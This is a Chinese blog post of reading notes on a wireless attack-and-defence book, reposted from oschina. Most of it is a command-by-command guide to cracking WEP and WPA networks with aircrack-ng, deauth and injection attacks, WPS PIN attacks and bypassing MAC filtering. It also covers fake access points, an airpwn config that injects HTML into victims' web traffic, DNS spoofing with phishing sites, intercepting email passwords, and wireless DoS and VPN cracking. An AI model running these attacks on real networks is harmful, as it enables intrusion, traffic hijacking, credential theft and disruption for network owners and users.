博客

《无线网络安全攻防实战》读书笔记

  • Post author:
  • Post category:其他



为什么80%的码农都做不了架构师?>>>

hot3.png


《无线网络安全攻防实战

虽然无线破解早就烂大街了,还是去图书馆把这本书补上了,做个笔记,以供以后参考,记得很全面但很乱。测试环境为Kali linux 或backtrack


wep破解

1.将网卡激活成monitor模式

airmon-ng start wlan0 6

2.开始抓取无线数据包:

airodump-ng -w ciw.cap –channel 6 mon0

3.为了加快IV(初始化向量)的获取,可以进行ArpRequest注入式攻击,可以有效提高抓包数量及破解速度:

aireplay-ng -3 -b AP’s MAC -h Client’s MAC -x 1024 wlan0

参数解释:

* -3,指的是采取ArpRequest注入攻击方式;

* -b,后面跟上要入侵的AP的MAC地址;

* -h,建议使用,效果会更好,后面跟的是监测到的客户端MAC地址;

* -x num,指的是定义每秒发送数据包数量,这个num值可以根据实际情况调小一些,但一般来说最高1024就可以

4.开启aircrack-ng来进行同步破解:

aircrack-ng -x -f 2 ciw.cap

参数解释:

* -x,是暴力破解模式;

* -f,指启用密码复杂度为2;

1.启动无线网卡的监听模式

$ sudo airmon-ng start wlan0


2.  查看有哪些采用wep加密的路由器,记录目标ap的mac

$ sudo airodump-ng mon0


3. 另开一个终端,运行

$ sudo airodump-ng -c 6 –bssid AP’s MAC -w wep mon0

其中6是AP的信道(channel),AP’sMAC是路由器的MAC地址,wep的是抓下来的数据包保存的文件名


4. 再另开一个终端,与AP建立虚拟连接

$ sudo aireplay-ng -1 0 -a AP’s MAC -h My-MAC mon0


5. 建立虚拟连接成功后,运行下面命令,加速数据获取

$ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My-MAC mon0

6. 收集5000个以上的DATA之后,开始进行解密 。另开一个终端,运行

$ sudo aircrack-ng wep*.cap

如果暂时没算出来的话,继续等,aircrack-ng 会在DATA每增加5000个之后自动再次运行,直到算出密码为止


7. 破解成功后,关闭监控模式

$ sudo airmon-ng stop mon0


自动攻击工具:wep spoonfeeder

Deauth验证攻击,这个对于采用WPA验证的AP攻击都会用到,可以迫使AP重新与客户端进行握手验证,从而使得截获成为可能。命令如下

aireplay-ng  -0  10  -a   AP’s MAC   mon0

或者

aireplay-ng  -0  10  -a   AP’s MAC   -h  Client’s MAC   mon0

-0指的是采取Deautenticate攻击方式,后面为发送次数,-a后面跟上要入侵的AP的MAC地址,-h建议还是使用,效果会更好,这个后面跟的是监测到的客户端MAC地址



wep破解的多米诺骨牌


1.无客户端chopchop攻击


1.airodump-ng –ivs -c 6 -w file mon0     捕获数据

2.aireplay-ng -l  0  -e AP’ESSID -a AP’MAC -h CLIENT’MAC mon0

FakeAuth:与ap建立虚拟的验证连接,以便之后注入数据包

-h 用于攻击的网卡mac

3.aireplay-ng -4 -b AP’MAC -h CLIENT’MAC mon0

-4 chopchop攻击,生成密钥数据流文件  -h 攻击者自己的mac

生成明文后缀为cap和密钥数据流后缀xor文件

4.tcpdump  -s  0  -n  -e  -r  replay_dec.cap

-s 从每个报文截取snaplen字节的数据

-n 不进行ip地址到主机名的转换

-e 在输出行打印数据链路层头部信息

-r 从文件读取包

5.packetforge-ng -0 -a AP’MAC -h CLIENT’MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment xor file -w writetofile

-0  创建一个arp包

-k ip目标ip及端口

-l ip 来源ip及端口

-y file,从文件读取prga数据

-w file  将生成的数据报文写入cap文件

6.aireplay-ng  -2  -r  writetofile  mon0

为加快iv(初始化向量)获取,进行Interactive Attack及交互式攻击,将构造的数据包发送至目标ap

7.aircrack-ng   chop*ivs

破解密码


2.无客户端Fragment攻击


1.捕获

2.FakeAuth,虚假验证,监听界面会出现伪造的客户端

3.aireplay-ng  -5  -b  AP’MAC  -h  CLIENT’MAC  mon0

-5  fragment攻击,生成可用密钥数据流文件

-h  攻击者自己的网卡mac

4.packetforge-ng 构造注入数据包

5.文件生成后,同时进行InteractiveAttack攻击,在airodump下可看到数据飞涨

6.aircrack


3.无客户端ARP+Deauth攻击


1.airodump-ng  -w  file  –channel  6  mon0

2.aireplay-ng  -l  0  -e AP’ESSID -a  AP’MAC  -a  FakeMac mon0

fakeauth攻击

3.aireplay-ng  -l  6000   -o  1  -q  10  -e  AP’ESSID  -a  AP’MAC  -h  ATTK’MAC

保证伪造客户端在线

-l delay  延迟数量

-o  每次发送数据包数量

-q sec  发送keep-alives数据包时间间隔

-e 目标ssid

4.aireplay-ng  -3  -b  AP’MAC   -h  CLIENT’MAC  mon0

-3  同时进行arp注入攻击

5.aircrack-ng  -n  152  file

152为wep破解

共享密钥的wep破解

1.监听模式

2.抓包,若客户端没有活动,则deauth攻击,aireplay-ng  -0  1  -a  AP’MAC  mon0

可看到CIPHER栏出现ska标识,右上角出现keystream提示

生成三个文件a.mac.xor, a.cap,  a.txt.  xor文件为包含预共享密钥的文件

3.fakeauth攻击。

aireplay-ng  -1  0  -e AP’ESSID -y a.xor  -a  AP’MAC  -h FAKEMAC  mon0

-1 ,fakeauth模式

-h,客户端mac或伪造mac

4.可同时进行ArpRequest注入攻击,进行完fakeauth攻击后,此时aireplay监听界面截获的ARP request数据为0,可再次进行deauth攻击使其重连。

5.aircrack-ng  filename


关闭ssid广播的对策

1,抓包分析

2,暴力破解

3,deauth攻击

1.airodump探测,关闭ssid的ap只显示ssid的长度

2.deauth使其重连

3,监听界面出现ssid



突破mac地址过滤

1.获取合法客户端mac地址,airodump、omnipeek、kismet

2.更改mac地址伪造身份。win下用smac,linux下ifconfig wlan0  hw ether MAC    或  athmacchange.sh

3.重新装载网卡,连接ap



数据分析


1.查看ap品牌

2.查看对方访问网站,观察目标习惯,深入攻击

3.截获邮箱等账户密码


破解wpa



一、传统wpa-psk破解


1、2、3.激活网卡,设为monitor模式,捕获数据

4.aireplay-ng  -0 1 -a AP’MAC -c CLIENT’MAC wlan0? Deauth攻击获取wpa握手报文

5.aircrack-ng -w dic filename.cap 破解密码

Deauth数据包将以连接至无线路由器的合法无线客户端强制断开,客户端重连,便可以捕获握手包。

-0 之后跟上攻击次数,可根据情况5~10不等;

如果成功,在airodump-ng界面右上角可以看到“wpa handshake”的提示。

-w 后跟字典名。


二、wpa pmk hash破解


内存-时间平衡。 彩虹表。wpa rainbow tables. wpa pmk hash tables.


关于aircrack-ng

主要组件

aircrack-ng 自动检测数据包,恢复密码

airmon-ng 改变无线网卡模式

aiodump-ng 捕获802.11数据

aireplay-ng 创建特殊的数据报文及流量

airserv-ng 将无线网卡连接至某一特定端口

airolib-ng 进行wpa rainbow table攻击时使用,用于建立特定数据库文件

airdecap-ng 解开处于加密状态的数据包

airdriver-ng 显示支持的网卡

airdecloak-ng 过滤出指定的数据

packetforge-ng 为注入攻击制作特殊加密报文,主要用于无客户端破解攻击

wesside-ng 自动wep破解工具,加入fragmentation攻击

tkiptun-ng 针对wpa tkip加密且启用qos的网络

(A) airdecap-ng

airdecap-ng -l -e AP’essid -p AP’password filename.cap

-l 不移除802.11 header部分,防止加密后的文件不可读

对于wep包

airdecap-ng -w AP’password filename.cap

-w 后跟wep十六进制密码

解密后可用wireshark分析

(B)ivstools

合并ivs文件:

ivstools –merge 1.ivs 2.ivs 3.ivs out.ivs

转换cap问ivs

ivstools –convert test.cap test.ivs

(C)airdrive-ng

airdrive-ng supported        查看支持芯片

airdrive-ng detail 序号        详细

airdrive-ng installed        已安装驱动

(D)airdecloak-ng

airdecloak-ng –bssid AP’MAC –filters signal -i 无线报文filename.cap

–filters 过滤选项,跟具体参数

完成后,会保存为后缀名为filtered的pcap文件。


关于wesside-ng


自动破解wep的工具.找出当前连接该无线网络的其他客户端mac,进行身份欺骗,使用类似fragmentation攻击方式,拦截广播及转发数据包,发现prga数据包。注入arp数据报,调用aircrack-ng PTW破解密码。

1.ifconfig wlan0 up

2.airmon-ng start wlan0

3.airodump-ng mon0

4.wesside-ng -v AP’MAC -k 1 -i mon0

-k 重传次数,跟具体数值

捕获数据包保存在wep.cap的文件,可用aircrack-ng对该文件再次破解。


关于tkiptun-ng. 破解wpa


可以解开tkip加密了的数据包,并不是算出密钥。

1.安装

2.激活无线网卡,设为监听模式

3.tkiptun-ng -a AP’MAC -h CLIENT’MAC mon0 或

tkiptun-ng -a AP’MAC -h CLIENT’MAC -m 80 -n 100 mon0

-m 最小包长度

-n  最大包长度


wps破解wpa/wpa2的捷径


1.将网卡设为监听模式

2../wpscan.py -i mon0        扫描开启wps功能的无线设备

3../wpspy.py -i mon0 -e AP’SSID     监测wps状态,是否为已配置

4.打开无线网卡自带配置工具,pin码连接,使用星号查看器查看密码

csrf攻击

现在也可以用

reaver跑pin码


关于GPU破解


CUDA

1.获取wpa-psk握手数据包,工具(airodump-ng,omnipeek,commview for wifi,airdefense)

2.打开ewsa,cpu、gpu、dictionary设置

3.import tcpdump file导入握手包,cap、pcap、dmp等

4.开始破解

5.未注册版本只显示两位密码,用winhex查看内存。“工具”–“打开ram内存”–找到ewsa的进程,–“find text“,输入破解的前两位密码,编码模式为”ascii/code“


关于分布式破解


free rainbow tables项目、ZerOne团队分布破解项目


cowpatty破解wpa

1.分析抓获的wpa握手包数据

2.cowpatty  -f  passd.txt  -r  wpa.cap  -s  AP’ESSID  -v

-f,后跟字典

-r,抓包文件


table破解

1.genpmk  -f  wordlist1.txt  -d  tablename  -s  AP’ESSID

-f 字典

-d 生成的table文件名

2.cowpatty  -d  tablename  -r  a.cap  -s  AP’ESSID

1.airolib-ng  test  init

test 要建立的数据库

init 建立数据库的命令

2.airolib-ng  test  import   cowpatty  tablename

导入预运算tables

3.airolib-ng  database  stats

查看数据库状态

4.aircrack-ng  -r  test  capturefile


无线欺骗攻击


伪造ap


1基于硬件的伪造ap。 刷新无线路由firmware,dd-wrt ,openwrt, AirSnarf

2.基于软件的伪造ap

fakeAP

fakeap.pl –interface 网卡名 –channel 频道 –essid AP’SSID –mac AP’MAC

–essid zunzhe008 –interface wlan0

如不必需,可省略mac

airbase-ng

基于上软件的自动化脚本mitmap.sh

./mitmap.sh -m ap -i wlan0 -o eth0 -s AP’SSID

-m 跟四种模式之一

-o 跟有线网卡名,一定要先配置完毕,确保能连接外网

-s 伪造ap的ssid,一般和预伪造目标一致

会将捕获数据保存在当前目录.cap文件

airpwn

下载解压 tar zxvf airpwn

cd airpwn

tar zxvf lorcon-current.tgz

cd lorcon

configure&&make&&make install

cd ..   &&  configure  &&  make

(libpcre库)

缺少文件:cp /usr/local/lib/liborcon-1.0.0.so /usr/lib

破解网络之后进行欺骗

注入配置文件:在airpwn主目录下

conf目录下,编写名为zerone.html的文件

内容:

begin zerone_html

match  ^(GET|POST)

ignore  ^GET [^ ?]+\.(jpg|jepg|gif|png|tif|tiff)

response content/zerone_html

只要出现GET或POST请求报文,就将其中网址替换成content目录下的zerone_html

content目录下编写zerone_html文件

HTTP/1.1 200 OK

Connection: close

Content-type: text/html

<html><head><title>hack you!!1</title></head>

<body><img src=’http://xxxxxxx’ width=’100%’ height=’100%’>

</head><body onLoad=”alert();”>

攻击前注意airpwn支持的网卡

airpwn -c conf/zerone_html -i rausb0 -d rt73 -vvv -F -k WEP

-c 制定配置文件

-d 跟支持的无线网卡驱动名称

-F 假设设置为监听模式的网卡中没有FCS values?

-k wep的16进制密码

连接请求网址验证效果


搜索发现伪造ap:


namp  -vv -sS 192.168.1.0/24  -p 80

-sS 采用SYN扫描,在有防火墙时常用

nmap -vv -sV  192.168.1.1 -p 80

-sV 具体版本识别,对端口服务信息探测时使用

收敛法向量法定位ap


MITM:


Monkey-jack


无线跳板攻击


airserv-ng

1.在跳板机1上安装airserv-ng,将网卡设置为提供无线网卡远程访问的服务器

airserv-ng -d 网卡  -p 端口     其他计算机只要连接到这个端口就可以使用此网卡

2.配置端口重定向工具

fpipe -l port -r port IP

-l 监听本地某个端口

-r 转发至某个端口,可以是本机

其他跳板也是如此,一般各跳板端口不同,减少暴露

3,远程攻击

airodump-ng IP:port

常见错误:address already in use,由已开启airserv-ng网络网卡服务并用默认666端口所致,修改端口或停止相应airserv

icmp协议隧道

loki

http协议隧道

GNU HTTPTunnel, HTTP Tunnel


伪造站点+dns欺骗


1.伪造站点

2.dns欺骗

3.查看效果,ping域名,显示内网ip


伪造电子邮件+伪造站点


1.截获邮箱帐号

2.建立伪造站点

3.受害者收到伪造电子邮件,包含域名相似的伪造站点


无线DOS攻击

关联及认证状态:

state1.未通过验证,未建立关联

state2.通过验证,未建立关联

state3.通过验证,建立关联

Access Point Overload , 无线接入点过载攻击

–只要客户端关联表达到饱和程度,接入点就会开始拒绝新的关联请求,这种状态为接入点过载。

Authentication Flood , 身份验证洪水攻击

–大量伪造的身份验证请求超过所能承受的能力时,ap将断开其他无线服务连接。

Authentication Failure , 身份验证失败攻击

–注入无效身份验证请求帧,使ap与客户端的连接中断

Deauthentication Flood , 取消身份验证洪水攻击、验证阻断洪水攻击

–伪造deauthentication帧,注入,踢出合法客户端

Association Flood ,  关联洪水攻击、关联淹没攻击

–对于开放身份验证。伪造关联,填充连接状态表。攻击工作在链路层

Disassociation Flood , 取消关联洪水攻击

–取消关联广播多用于配合中间人攻击,而这个常用于目标确定的p2p dos

Duration Attack , 持续时间攻击

–发送占用巨大持续时间值的帧,使其他节点等待

Wireless Adapter Driver Buffer Overflow, 无线网卡驱动溢出攻击

1.网卡漏洞检测工具

WiFi DEnum

2.网络资源,WVE,AusCERT,Milw0rm.com

3.攻击实现工具

metasploit framework

RF Jamming, 射频干扰攻击

–全频道阻塞、瞄准式阻塞


无线vpn破解

1.扫描vpn设备

namp、zenmap

2.截获vpn交互数据包

中间人攻击,ettercap、cain

3.破解

asleap:用于pptp/leap密码恢复

genkeys:将普通字典装换成asleap可识别的dat和idx专用hash文件

genkeys  -r  dict  -f  simple.dat   -n  simple.idx

-r 事先准备的字典

-f 预制作的dat格式hash文件

-n 预制作的idx格式hash文件

asleap -r shark -f  simple.dat  -n simple.idx

-r 截获的vpn客户端登录数据包

1.IPSecScan扫描启用ipsec的设备

ipsecscan  ip

2.确认vpn设备

ike-scan  –sport=0  -M ip

–sport=<port> 设置udp源端口,默认500,随机端口为0.

-M 将结果逐行显示

–showbackoff  vpn指纹识别

ike-scan  –sport=0  –showbackoff  -M ip 探测vpn操作系统或设备版本

3.基于截获数据cain破解


转载于:https://my.oschina.net/sukai/blog/406895